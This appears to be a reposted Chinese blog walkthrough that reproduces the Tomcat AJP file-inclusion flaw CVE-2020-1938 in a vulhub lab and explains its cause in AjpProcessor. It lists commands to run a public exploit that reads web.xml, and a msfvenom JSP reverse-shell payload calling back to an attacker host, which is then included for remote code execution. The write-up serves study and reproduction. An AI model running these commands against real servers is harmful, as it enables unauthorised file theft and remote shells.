CVE-2020-1938 Tomcat远程文件包含漏洞

这篇具有很好参考价值的文章主要介绍了CVE-2020-1938 Tomcat远程文件包含漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

漏洞简介

CVE-2020-1938是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。

影响版本

Apache Tomcat 9.x < 9.0.31

Apache Tomcat 8.x < 8.5.51

Apache Tomcat 7.x < 7.0.100

Apache Tomcat 6.x

漏洞复现

/vulhub/tomcat/CVE-2020-1938
docker-compose up -d

CVE-2020-1938 Tomcat远程文件包含漏洞,漏洞复现,tomcat,java,网络安全

git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.47.129 -p 8009 -f /WEB-INF/web.xml

CVE-2020-1938 Tomcat远程文件包含漏洞,漏洞复现,tomcat,java,网络安全

读取到web.xml,漏洞复现成功

漏洞利用

如果服务器上本身具有木马程序,则访问时加入后缀.jsp即可进行远程命令执行
CVE-2020-1938 Tomcat远程文件包含漏洞,漏洞复现,tomcat,java,网络安全首先生成java木马文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机ip LPORT=攻击机开放的端口号 -f raw > aini_shell.txt

CVE-2020-1938 Tomcat远程文件包含漏洞,漏洞复现,tomcat,java,网络安全
将其复制到服务器,模拟这个web应用有个文件上传漏洞,并且成功利用了

docker cp aini_shell.txt 4b364a8851f8:/usr/local/tomcat/webapps/ROOT/WEB-INF/

CVE-2020-1938 Tomcat远程文件包含漏洞,漏洞复现,tomcat,java,网络安全
使用修改后的exp访问java木马

python2 rce.py 127.0.0.1 -p 8009 -f /WEB-INF/aini_shell.txt

CVE-2020-1938 Tomcat远程文件包含漏洞,漏洞复现,tomcat,java,网络安全
攻击机成功getshell
CVE-2020-1938 Tomcat远程文件包含漏洞,漏洞复现,tomcat,java,网络安全

漏洞原理

找到tomcat 9.0.30的源码
https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.30/

org.apache.coyote.ajp.AjpProcessor类中,tomcat对ajp传递来的数据的处理方式存在问题,导致用户可以控制:

“javax.servlet.include.request_uri”
“javax.servlet.include.path_info”
“javax.servlet.include.servlet_path”
CVE-2020-1938 Tomcat远程文件包含漏洞,漏洞复现,tomcat,java,网络安全

根据获得的路径获取资源
CVE-2020-1938 Tomcat远程文件包含漏洞,漏洞复现,tomcat,java,网络安全

或提交给jspservelet进行执行
CVE-2020-1938 Tomcat远程文件包含漏洞,漏洞复现,tomcat,java,网络安全
CVE-2020-1938 Tomcat远程文件包含漏洞,漏洞复现,tomcat,java,网络安全

修复建议

升级版本文章来源地址https://www.toymoban.com/news/detail-724550.html

到了这里,关于CVE-2020-1938 Tomcat远程文件包含漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 以Apache Tomcat CVE-2020-1938任意文件读取漏洞(Tomghost)为例基于Tryhackme Tomghost Room的一次渗透测试

    Tomcat服务器是一个免费的开放源代码的Web应用服务器,被普遍使用在轻量级Web应用服务的构架中。 Tomcat提供了可以在其中运行Java代码的“纯Java” HTTP Web服务器环境。 CVE-2020-1938是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻

    2024年02月12日
    浏览(46)
  • 【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的

    2024年02月08日
    浏览(53)
  • Tomcat--文件上传--文件包含--(CVE-2017-12615)&&(CVE-2020-1938)

    采用Vulfocus靶场环境进行复现,搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败。 当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过精心构造的

    2024年02月08日
    浏览(43)
  • 文件上传漏洞(webshell)和文件包含漏洞

    1、判断文件后缀,为图片的话才让上传成功。 2、解析文件内容(文件幻数)判断文件头和文件尾部是否一致 幻数 常见的 3、隐藏按钮(带上code唯一值) 4、二次渲染(类似拿着你的图片,我再拿手机在你的图片上拍上一张),删除缓存图片 5、文件重命名,避免从客户端拿

    2024年02月13日
    浏览(55)
  • OSCP-Slort(远程文件包含、windows定时任务提权)

    端口8080和4443都包含相同的Web目录,重定向到XAMPP的/dashboard/目录。

    2023年04月26日
    浏览(40)
  • Apache Tomcat 安全漏洞(CVE-2020-13935)复现

    漏洞详情: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。 影响版

    2024年02月11日
    浏览(47)
  • Tomcat Session(CVE-2020-9484)反序列化漏洞复现

            北京时间2020年05月20日,Apache官方发布了 Apache Tomcat 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-9484。 Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用

    2024年02月01日
    浏览(45)
  • CVE-2020-14882 weblogic未授权远程命令执行漏洞

    一、漏洞描述 Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危

    2024年02月16日
    浏览(37)
  • Linux:概述 、安装 、文件与目录结构 、vim编辑器 、网络配置 、远程登录 、系统管理 、基础命令 、软件包管理 、克隆虚拟机 、shell编程

    2.1.1、Linux是什么? Linux是一个操作系统(OS) 所谓的操作系统就是直接用来操作计算机底层硬件的软件。 2.1.2、Linux的出现 官网: https://www.centos.org/ 进入官网进行下载 有很多的镜像,以阿里云的为例: 3.3.1、下载 官网: https://www.vmware.com/ 这是下载的企业版,30天试用期,可

    2024年02月05日
    浏览(65)
  • SMB服务远程代码执行漏洞(CVE-2020-0796)加固指南

    漏洞信息 序号 漏洞类型 风险等级 漏洞主机( 操作系统及版本) 1 SMB 服务远程代码执行漏洞(CVE-2020-0796) 高 Windows 漏洞加固实施 漏洞1:SMB服务远程代码执行漏洞(CVE-2020-0796) 漏洞详细 2020年3月11日,某国外安全公司发布了一个近期微软安全补丁包所涉及漏洞的综述,其中谈

    2024年02月07日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包